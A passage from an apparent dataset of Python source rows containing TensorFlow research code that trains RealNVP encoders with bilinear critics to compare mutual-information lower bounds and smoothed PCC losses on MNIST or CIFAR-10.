dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
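# A minimal standalone NumPy sketch of the InfoNCE lower bound used throughout the
# rows above (infonce_lower_bound): positive pairs sit on the diagonal of the critic
# matrix and the bound is capped at log(batch_size). The toy critic matrix and the
# helper name `infonce_lower_bound_np` are illustrative assumptions, not part of the
# original TF graph code.
import numpy as np

def infonce_lower_bound_np(scores):
    """log(K) + mean_i [ f(x_i, y_i) - logsumexp_j f(x_i, y_j) ]."""
    k = scores.shape[0]
    row_max = scores.max(axis=1, keepdims=True)                    # stabilise the log-sum-exp
    lse = row_max[:, 0] + np.log(np.exp(scores - row_max).sum(axis=1))
    nll = np.mean(np.diag(scores) - lse)
    return np.log(k) + nll

rng = np.random.default_rng(0)
toy_scores = rng.normal(size=(64, 64)) + 3.0 * np.eye(64)          # diagonal = positive pairs
print(infonce_lower_bound_np(toy_scores))                          # always <= log(64) ~= 4.16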
"<import token>\n<assignment token>\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\n<assignment token>\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n<assignment token>\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\n<assignment token>\ntf.keras.backend.clear_session()\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp 
- tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n 
logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\ntf.compat.v1.reset_default_graph()\n<assignment token>\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n 
output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if 
tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
